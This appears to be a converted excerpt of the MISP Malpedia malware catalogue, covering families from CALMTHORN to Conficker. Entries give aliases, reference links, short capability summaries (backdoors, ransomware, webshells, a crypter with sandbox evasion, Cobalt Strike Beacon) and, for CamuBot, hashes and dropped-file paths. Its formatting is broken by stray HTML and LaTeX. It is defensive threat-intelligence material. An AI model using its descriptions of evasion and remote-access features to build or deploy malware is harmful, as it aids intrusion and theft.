- Caddle

*Table 1480. Table References*

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**CALMTHORN**

The tag is: `misp-galaxy:malpedia="CALMTHORN"`

CALMTHORN is also known as:

*Table 1481. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn">https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=3cUWjojQXWE">https://www.youtube.com/watch?v=3cUWjojQXWE</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/8th_grey_owl/status/1357550261963689985">https://twitter.com/8th_grey_owl/status/1357550261963689985</a></td>
</tr>
</tbody>
</table>

**CamuBot**

There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :

CamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479

Dropped Files on disk :

C:\Users\user~1\AppData\Local\Temp\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1

C:\Users\user~1\AppData\Local\Temp\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8

C:\ProgramData\m.msi :
Protecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi

A new driver is installed: C:\Windows\system32\drivers\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8

ftusbload2.sys set 28 IRP handlers.

The tag is: misp-galaxy:malpedia="CamuBot"

CamuBot is also known as:

Table 1482. Table References

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot">https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot</a></td>
</tr>
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</table>

Cannibal Rat

Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.

The tag is: misp-galaxy:malpedia="Cannibal Rat"

Cannibal Rat is also known as:

Table 1483. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat</a></td>
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<tr>
<td><a href="http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html">http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html</a></td>
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Cannon

The tag is: misp-galaxy:malpedia="Cannon"

Cannon is also known as:

Table 1484. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon">https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon</a></td>
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Carbanak

The tag is: misp-galaxy:malpedia="Carbanak"

Carbanak is also known as:

- Anunak

Table 1485. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak">https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak</a></td>
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<td><a href="https://threatintel.blog/OPBlueRaven-Part1/">https://threatintel.blog/OPBlueRaven-Part1/</a></td>
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<td><a href="https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwyqye">https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwyqye</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html">https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-niagara">https://www.secureworks.com/research/threat-profiles/gold-niagara</a></td>
</tr>
<tr>
<td><a href="https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest">https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest</a></td>
</tr>
<tr>
<td><a href="https://threatintel.blog/OPBlueRaven-Part2/">https://threatintel.blog/OPBlueRaven-Part2/</a></td>
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Carberp

The tag is: misp-galaxy:malpedia="Carberp"
Carberp is also known as:

Table 1486. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp">https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp</a></td>
</tr>
<tr>
<td><a href="https://blog.avast.com/2013/04/08/carberp_epitaph/">https://blog.avast.com/2013/04/08/carberp_epitaph/</a></td>
</tr>
</tbody>
</table>

**Cardinal RAT**

Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.

The tag is: *misp-galaxy:malpedia="Cardinal RAT"*

Cardinal RAT is also known as:

Table 1487. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat</a></td>
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<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&amp;adbid=855028404965433346&amp;adbpl=tw&amp;adbpr=4487645412">http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&amp;adbid=855028404965433346&amp;adbpl=tw&amp;adbpr=4487645412</a></td>
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<td><a href="https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection">https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/">https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/</a></td>
</tr>
</tbody>
</table>

**CARROTBALL**

CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.

The tag is: *misp-galaxy:malpedia="CARROTBALL"*

CARROTBALL is also known as:

Table 1488. Table References
CarrotBat

The tag is: *misp-galaxy:malpedia*="CarrotBat"

CarrotBat is also known as:

Table 1489. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball">https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball</a></td>
</tr>
</tbody>
</table>

Casper

ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.

The tag is: *misp-galaxy:malpedia*="Casper"

Casper is also known as:

Table 1490. Table References

<table>
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<th>Links</th>
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<tr>
<td><a href="https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/">https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/</a></td>
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Catchamas

The tag is: *misp-galaxy:malpedia*="Catchamas"

Catchamas is also known as:

Table 1491. Table References
CCleaner Backdoor

The tag is: misp-galaxy:malpedia="CCleaner Backdoor"

CCleaner Backdoor is also known as:

- DIRT_CLEANER

Table 1492. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor">https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor</a></td>
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<tr>
<td><a href="https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities">https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/">https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/</a></td>
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<tr>
<td><a href="https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident">https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-atlas">https://www.secureworks.com/research/threat-profiles/bronze-atlas</a></td>
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<td><a href="https://risky.biz/whatiswinnti/">https://risky.biz/whatiswinnti/</a></td>
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<tr>
<td><a href="https://blog.avast.com/progress-on-ccleaner-investigation">https://blog.avast.com/progress-on-ccleaner-investigation</a></td>
</tr>
<tr>
<td><a href="https://www.wired.com/story/ccleaner-malware-targeted-tech-firms">https://www.wired.com/story/ccleaner-malware-targeted-tech-firms</a></td>
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<td><a href="https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer">https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer</a></td>
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<td><a href="https://twitter.com/craiu/status/910148928796061696">https://twitter.com/craiu/status/910148928796061696</a></td>
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<td><a href="https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident">https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident</a></td>
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<tr>
<td><a href="http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor">http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor</a></td>
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CenterPOS

The tag is: misp-galaxy:malpedia="CenterPOS"

CenterPOS is also known as:

- cerebrus

Table 1493. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos">https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html">https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html</a></td>
</tr>
</tbody>
</table>

Cerber

A prolific ransomware which originally added ".cerber" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of UDP activity to checkin and report infections. Primarily uses TOR for payment information.

The tag is: misp-galaxy:malpedia="Cerber"

Cerber is also known as:

Table 1494. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber">https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/">https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/</a></td>
</tr>
<tr>
<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-345a">https://us-cert.cisa.gov/ncas/alerts/aa20-345a</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=LUxOcpIRxmg">https://www.youtube.com/watch?v=LUxOcpIRxmg</a></td>
</tr>
</tbody>
</table>

Cerbu

This malware family delivers its artifacts packed with free and generic packers. It writes files to Windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.

The tag is: misp-galaxy:malpedia="Cerbu"

Cerbu is also known as:
Chainshot

The tag is: `misp-galaxy:malpedia="Chainshot"`

Chainshot is also known as:

Table 1496. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot">https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot</a></td>
</tr>
<tr>
<td><a href="https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack">https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack</a></td>
</tr>
</tbody>
</table>

Chaperone

According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.

The tag is: `misp-galaxy:malpedia="Chaperone"`

Chaperone is also known as:

- Taj Mahal

Table 1497. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone">https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone</a></td>
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<td><a href="https://securelist.com/project-tajmahal/90240/">https://securelist.com/project-tajmahal/90240/</a></td>
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<tr>
<td><a href="https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal">https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal</a></td>
</tr>
</tbody>
</table>
CHCH Ransomware

CHCH is a Ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them while it drops a ransomware note named: READ_ME.TXT

The tag is: misp-galaxy:malpedia="CHCH Ransomware"

CHCH Ransomware is also known as:

Table 1498. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.chch">https://malpedia.caad.fkie.fraunhofer.de/details/win.chch</a></td>
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<td><a href="https://twitter.com/GrujaRS/status/1205566219971125249">https://twitter.com/GrujaRS/status/1205566219971125249</a></td>
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ChChes

The tag is: misp-galaxy:malpedia="ChChes"

ChChes is also known as:

- HAYMAKER
- Ham Backdoor

Table 1499. Table References

<table>
<thead>
<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.chches">https://malpedia.caad.fkie.fraunhofer.de/details/win.chches</a></td>
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<td><a href="https://www.jpcert.or.jp/magazine/acreport-ChChes.html">https://www.jpcert.or.jp/magazine/acreport-ChChes.html</a></td>
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<td><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-riverside">https://www.secureworks.com/research/threat-profiles/bronze-riverside</a></td>
</tr>
<tr>
<td><a href="https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html">https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html</a></td>
</tr>
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CHEESETRAY

CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes among its other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP with port specified as a command-line parameter.
The tag is: `misp-galaxy:malpedia="CHEESETRAY"`

CHEESETRAY is also known as:

- CROWDEDFLOUNDER

Table 1500. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray">https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray</a></td>
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<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-045c">https://www.us-cert.gov/ncas/analysis-reports/ar20-045c</a></td>
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</table>

**Chernolocker**

Chernolocker is a ransomware that encrypts a victim's files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker's email address which changes over time.

The tag is: `misp-galaxy:malpedia="Chernolocker"`

Chernolocker is also known as:

Table 1501. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html">https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html</a></td>
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**CherryPicker POS**

The tag is: `misp-galaxy:malpedia="CherryPicker POS"`

CherryPicker POS is also known as:

- cherry_picker
- cherrypicker
- cherrypickerpos

Table 1502. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker">https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker</a></td>
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**ChewBacca**

The tag is: *misp-galaxy:malpedia=*ChewBacca*

ChewBacca is also known as:

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**CHINACHOPPER**

A simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The tag is: *misp-galaxy:malpedia=*CHINACHOPPER*

CHINACHOPPER is also known as:

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<td><a href="https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers">https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-express">https://www.secureworks.com/research/threat-profiles/bronze-express</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/china-chopper-webshell/">https://unit42.paloaltonetworks.com/china-chopper-webshell/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-president">https://www.secureworks.com/research/threat-profiles/bronze-president</a></td>
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<td><a href="https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day">https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/">https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/</a></td>
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<td><a href="https://twitter.com/ESETresearch/status/1366862946488451088">https://twitter.com/ESETresearch/status/1366862946488451088</a></td>
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Chinad

Adware that shows advertisements using plugin techniques for popular browsers

The tag is: misp-galaxy:malpedia="Chinad"

Chinad is also known as:

Table 1505. Table References

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ChinaJm Ransomware

The tag is: misp-galaxy:malpedia="ChinaJm Ransomware"

ChinaJm Ransomware is also known as:

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Chinoxy

The tag is: misp-galaxy:malpedia="Chinoxy"

Chinoxy is also known as:

Table 1507. Table References

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<td><a href="https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ff9898ca2a02">https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ff9898ca2a02</a></td>
</tr>
<tr>
<td><a href="https://nao-sec.org/2021/01/royal-road-redive.html">https://nao-sec.org/2021/01/royal-road-redive.html</a></td>
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<tr>
<td><a href="https://community.riskiq.com/article/56fa1b2f">https://community.riskiq.com/article/56fa1b2f</a></td>
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Chir

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Chir is also known as:

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Chthonic

The tag is: \textit{misp-galaxy:malpedia=\textquoteright Chthonic\textquoteright}  

Chthonic is also known as:

- AndroKINS

\textit{Table 1509. Table References}

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<td><a href="https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html">https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html</a></td>
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Cifty

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cifty is also known as:

\textit{Table 1510. Table References}

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<td><a href="http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html">http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html</a></td>
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Cinobi

The tag is: misp-galaxy:malpedia="Cinobi"

Cinobi is also known as:

Table 1511. Table References

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Citadel

The tag is: misp-galaxy:malpedia="Citadel"

Citadel is also known as:

Table 1512. Table References

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<td><a href="http://www.xylibox.com/2016/02/citadel-0011-atmos.html">http://www.xylibox.com/2016/02/citadel-0011-atmos.html</a></td>
</tr>
<tr>
<td><a href="http://blog.jpcert.or.jp/2016/02/banking-trojan%E2%80%9427d6.html">http://blog.jpcert.or.jp/2016/02/banking-trojan—27d6.html</a></td>
</tr>
</tbody>
</table>

Clambling

Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.

The tag is: misp-galaxy:malpedia="Clambling"

Clambling is also known as:

Table 1513. Table References

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CLASSFON

The tag is: `misp-galaxy:malpedia="CLASSFON"`

CLASSFON is also known as:

Table 1514. Table References

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<tr>
<td><a href="https://content.fireeye.com/apt-41/rpt-apt41/">https://content.fireeye.com/apt-41/rpt-apt41/</a></td>
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</table>

CLEANTOAD

CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.

The tag is: `misp-galaxy:malpedia="CLEANTOAD"`

CLEANTOAD is also known as:

Table 1515. Table References

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Client Maximus

The tag is: `misp-galaxy:malpedia="Client Maximus"`

Client Maximus is also known as:

Table 1516. Table References

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</tr>
</tbody>
</table>
ClipBanker

The ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of sensitive information from the infected environment such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information. The ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. The distribution method of the ClipBanker is through phishing emails or through social media posts that lure users to download malicious content.

The tag is: misp-galaxy:malpedia="ClipBanker"

ClipBanker is also known as:

Table 1517. Table References

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</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/">https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/</a></td>
</tr>
</tbody>
</table>

Clop

Clop is a ransomware which uses the .clop extension after having encrypted the victim's files. Another unique characteristic belonging with Clop is in the string: "Dont Worry C|0P" included into the ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove the Microsoft Security Essentials in order to avoid user space detection.

The tag is: misp-galaxy:malpedia="Clop"

Clop is also known as:

Table 1518. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.clop">https://malpedia.caad.fkie.fraunhofer.de/details/win.clop</a></td>
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<td><a href="https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824">https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824</a></td>
</tr>
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</table>
CloudEyE

CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.

The tag is: misp-galaxy:malpedia="CloudEyE"

CloudEyE is also known as:

- GuLoader
- vbdropper

Table 1519. Table References

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<td><a href="https://labs.vipre.com/unloading-the-guloader/">https://labs.vipre.com/unloading-the-guloader/</a></td>
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Cloud Duke

The tag is: misp-galaxy:malpedia="Cloud Duke"

Cloud Duke is also known as:

Table 1520. Table References
CMSBrute

The tag is: misp-galaxy:malpedia="CMSBrute"

CMSBrute is also known as:

Table 1521. Table References

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<td><a href="https://securelist.com/the-shade-encryptor-a-double-threat/72087/">https://securelist.com/the-shade-encryptor-a-double-threat/72087/</a></td>
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CMSTAR

The tag is: misp-galaxy:malpedia="CMSTAR"

CMSTAR is also known as:

- meciv

Table 1522. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar">https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar</a></td>
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CoalaBot

The tag is: misp-galaxy:malpedia="CoalaBot"

CoalaBot is also known as:

Table 1523. Table References

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</table>
Cobalt Strike

Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

The tag is: misp-galaxy:malpedia="Cobalt Strike"

Cobalt Strike is also known as:

- Agentemis
- BEACON
- CobaltStrike

Table 1524. Table References

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<td><a href="https://www.hhs.gov/sites/default/files/bazarloader.pdf">https://www.hhs.gov/sites/default/files/bazarloader.pdf</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html">https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html</a></td>
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<td><a href="https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e">https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e</a></td>
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<td><a href="https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py">https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html">https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-president">https://www.secureworks.com/research/threat-profiles/bronze-president</a></td>
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Cobian RAT

The tag is: misp-galaxy:malpedia="Cobian RAT"

Cobian RAT is also known as:

Table 1525. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat
https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html
CobInt

CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager. It's CRM mailslot module was also observed being downloaded by ISFB.

The tag is: misp-galaxy:malpedia="CobInt"

CobInt is also known as:

- COOLPANTS

Table 1526. Table References

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Cobra Carbon System

The tag is: misp-galaxy:malpedia="Cobra Carbon System"

Cobra Carbon System is also known as:

- Carbon

Table 1527. Table References

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CockBlocker

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CodeKey

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Cohhoc

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Coinminer

Coinminer is an unwanted malicious software which uses the victim’s computational power (CPU and RAM mostly) to mine for coins (for example Monero or Zcash). The malware achieves persistence by adding one of the opensource miners on startup without the victim’s consensus. Most sophisticated coin miners use timer settings or cap the CPU usage in order to remain stealthy.

The tag is: *misp-galaxy:malpedia="Coinminer"*

Coinminer is also known as:

*Table 1531. Table References*

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ColdLock

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Cold$eal

Cold$eal is a packer for encrypting (sealing) malware. It contains some AV-evasion techniques as well as some sandbox-detection. It was developed by $@dok (aka Sadok aka Coldseal). It was available as a cryptor service under the url coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom made cryptostub including a FuD guarantee backed by free update to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. Upon start the cryptostub would extract the key, decrypt the payload and perform a selfinjection using the now decrypted payload. Note: The packed sample provided contains some harmless payload, while the unpacked sample is the bare cryptostub without a payload.

The tag is: misp-galaxy:malpedia="Cold$eal"

Cold$eal is also known as:

- ColdSeal

Table 1533. Table References

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CollectorGoomba

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CollectorGoomba is also known as:

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Colony

The tag is: misp-galaxy:malpedia="Colony"
Colony is also known as:

- Bandios
- GrayBird

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**Combojack**

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Combojack is also known as:

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**Combos**

The tag is: *misp-galaxy:malpedia=“Combos”*

Combos is also known as:

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**ComeBacker**

This malware was found in a backdoored Visual Studio project that was used to target security researchers.

The tag is: *misp-galaxy:malpedia=“ComeBacker”*
ComeBacker is also known as:

Table 1538. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker
https://www.anquanke.com/post/id/230161
https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/
https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/

Comfoo

The tag is: misp-galaxy:malpedia="Comfoo"

Comfoo is also known as:

Table 1539. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comfoo
https://www.secureworks.com/research/secrets-of-the-comfoo-masters

ComodoSec

The tag is: misp-galaxy:malpedia="ComodoSec"

ComodoSec is also known as:

Table 1540. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec
https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt

COMpfun

The tag is: misp-galaxy:malpedia="COMpfun"

COMpfun is also known as:

- Reductor RAT

Table 1541. Table References
Computrace

The tag is: `misp-galaxy:malpedia="Computrace"`

Computrace is also known as:

- lojack

*Table 1542. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace">https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace</a></td>
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<td><a href="https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/">https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
</tr>
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<td><a href="https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html">https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html</a></td>
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<td><a href="https://asert.arbornetworks.com/lojack-becomes-a-double-agent/">https://asert.arbornetworks.com/lojack-becomes-a-double-agent/</a></td>
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ComradeCircle

The tag is: `misp-galaxy:malpedia="ComradeCircle"`

ComradeCircle is also known as:

*Table 1543. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle">https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle</a></td>
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<td><a href="https://twitter.com/struppigel/status/816926371867926528">https://twitter.com/struppigel/status/816926371867926528</a></td>
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concealment_troy

The tag is: `misp-galaxy:malpedia="concealment_troy"`

concealment_troy is also known as:

*Table 1544. Table References*
Conficker

The tag is: misp-galaxy:malpedia="Conficker"

Conficker is also known as:

- Kido
- downadup
- traffic converter

Table 1545. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker">https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker</a></td>
